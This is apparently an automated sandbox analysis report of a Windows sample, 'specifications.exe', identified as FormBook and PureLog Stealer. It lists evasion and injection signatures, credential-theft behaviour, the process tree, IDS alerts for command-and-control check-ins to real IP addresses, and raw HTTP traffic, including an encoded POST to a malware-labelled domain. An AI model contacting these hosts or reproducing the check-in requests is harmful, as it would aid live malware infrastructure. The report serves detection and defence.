Windows Analysis Report
specifications.exe

Overview

General Information

Sample name: specifications.exe
Analysis ID: 1565081
MD5: 8f233b98037a9f801c3977afe32776a6
SHA1: f4f49244fc94081d79f2f16802441872fa509fb7
SHA256: 56074e8ad9bd7ee8b56c2bbd5c826c7bbcb1819dd0145c7a2733b8ce3d78938e
Tags: exe, Formbook, user-julianmckein

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • specifications.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\specifications.exe" MD5: 8F233B98037A9F801C3977AFE32776A6)
    • specifications.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\specifications.exe" MD5: 8F233B98037A9F801C3977AFE32776A6)
      • neghZqrDWkxUmu.exe (PID: 5572 cmdline: "C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchProtocolHost.exe (PID: 7912 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
          • neghZqrDWkxUmu.exe (PID: 1668 cmdline: "C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8064 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1734068950.00000000049B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1745019052.000000000A050000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.specifications.exe.a050000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
2.2.specifications.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.specifications.exe.a050000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.specifications.exe.49d24e8.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.specifications.exe.49d24e8.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

No Sigma rule has matched

                      AV Detection

                      Source: specifications.exe | Avira: detected
                      Source: http://www.5tuohbpzyj9.buzz/abgi/?JZOtU=LosdeFxQ6b3v/d4RM/O2IIZZxupncQ/ZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNvb4tlpcb0DKt+sPWXegcoTW+dqe2j7yGXM=&Tr=kdnPUNSPd0 | Avira URL Cloud: Label: malware
                      Source: http://www.5tuohbpzyj9.buzz/abgi/ | Avira URL Cloud: Label: malware
                      Source: specifications.exe | ReversingLabs: Detection: 50%
                      Source: Yara match | File source: 2.2.specifications.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.specifications.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.4145624190.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.2041857400.00000000013E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: specifications.exe | Joe Sandbox ML: detected
                      Source: specifications.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: specifications.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: neghZqrDWkxUmu.exe, 00000006.00000002.4144559573.0000000000D5E000.00000002.00000001.01000000.0000000C.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145192109.0000000000D5E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: specifications.exe, 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2043007374.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2040816792.000000000079A000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: specifications.exe, specifications.exe, 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000007.00000003.2043007374.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2040816792.000000000079A000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: SearchProtocolHost.pdbUGP source: neghZqrDWkxUmu.exe, 00000006.00000003.1980326179.000000000127C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: SearchProtocolHost.pdb source: neghZqrDWkxUmu.exe, 00000006.00000003.1980326179.000000000127C000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 7_2_0012C860 FindFirstFileW,FindNextFileW,FindClose | 7_2_0012C860
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 4x nop then xor eax, eax | 7_2_00119EA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 4x nop then mov ebx, 00000004h | 7_2_009E04E8

                      Networking

                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 23.225.159.42:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 156.232.181.155:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49786 -> 156.232.181.155:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 156.232.181.155:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49820 -> 185.27.134.206:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 156.232.181.155:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 185.27.134.206:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49814 -> 185.27.134.206:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49866 -> 104.21.90.137:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49880 -> 104.21.90.137:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49872 -> 104.21.90.137:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 209.74.77.107:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49860 -> 104.21.90.137:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49933 -> 176.32.38.130:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49939 -> 176.32.38.130:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49952 -> 176.32.38.130:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49896 -> 209.74.77.107:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49972 -> 161.97.168.245:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49983 -> 161.97.168.245:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50002 -> 103.75.185.22:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49977 -> 161.97.168.245:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50017 -> 103.75.185.22:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 208.91.197.27:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49917 -> 209.74.77.107:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 154.70.82.246:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50021 -> 155.94.253.4:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 103.75.185.22:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 208.91.197.27:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 155.94.253.4:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49966 -> 161.97.168.245:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 217.160.0.200:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 103.75.185.22:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 217.160.0.200:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50029 -> 217.160.0.200:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 217.160.0.200:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 172.67.216.173:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50033 -> 154.70.82.246:80
                      Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50025 -> 208.91.197.27:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 155.94.253.4:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49947 -> 176.32.38.130:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 155.94.253.4:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 154.70.82.246:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 185.27.134.206:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 154.70.82.246:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49911 -> 209.74.77.107:80
                      Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 208.91.197.27:80
                      Source: DNS query: www.acc888ommodate.xyz
                      Source: Joe Sandbox View | IP Address: 209.74.77.107
                      Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
                      Source: Joe Sandbox View | ASN Name: CNSERVERSUS
                      Source: Joe Sandbox View | ASN Name: CAFENETTG
                      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknown HTTP traffic detected: POST /abgi/ HTTP/1.1 Host: www.5tuohbpzyj9.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Origin: http://www.5tuohbpzyj9.buzz Content-Length: 202 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.5tuohbpzyj9.buzz/abgi/ User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+ Data Ascii: JZOtU=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+cph30g5+C3qTOnnX+qvtZQFyf+qYTxf/mw==
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:16:19 GMT Content-Type: text/html Content-Length: 566 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 08:16:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLS0Lu0gqL6tzqnbwqC5QEw7DbKy6XrI0qZVTtuLgooDy69F0WfMwDLoS%2BVJ9ZcL2mQhYRsywsOsYW1ArnytYh%2FjfbJ70z%2BWHsDS%2FSAgwsbOFvejD%2FYm1ImETG3bvqGlArpV7lYlGJw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea1286f99d743f3-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2098&rtt_var=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 08:16:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7CggccxsnXW%2FhR0TLeo3isDXG0YO%2BU95m02KrP0%2FlwXJBfHFrDD8CsGNsYNJFeYyQJ2UPf346%2BBXIpyxLCsnTQ78217dWrkbPm0%2FPzX7v0YRj2Rz0BmKLHbZyiUwj9mo6xA8136a0U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea128804e011a48-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 08:16:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYIhPh5v91Vr9cSSWglbYsqmgEjmFNNTRNR9DFBZZYyXgQSJYG%2BqypCdB7%2FbvwFgNfBnDWmd1MXkIp66zuJryFxLmbksWF73QJgMtCqSQ6MeX8P6cdsIlGG5COl1AMNrSJTRKiIvxn4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea128917f277293-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1974&rtt_var=987&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10889&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 08:16:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROENz4pmIO7tJtmEOnMzBV%2FbbB7QtIGe1M99XebE7TAis5sSU4olrQyJWrvygdyHvCAQrzF%2FDBLGiuL9ZkIep2vUU7YHxsV20LdPGHamYhcno%2FhwQStRNrItpxxIYt1C5QIwFAqa%2FTE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea128a269f743b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1679&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=511&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 08:17:06 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 08:17:09 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 08:17:11 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 08:17:14 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:17:21 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:17:24 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:17:26 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:17:29 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:17:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:17:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:17:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 29 Nov 2024 08:17:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96"
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Fri, 29 Nov 2024 08:18:00 GMT server: LiteSpeed
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 29 Nov 2024 08:18:07 GMT server: LiteSpeed
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 29 Nov 2024 08:18:10 GMT server: LiteSpeed
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 29 Nov 2024 08:18:12 GMT server: LiteSpeed
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 29 Nov 2024 08:18:15 GMT server: LiteSpeed
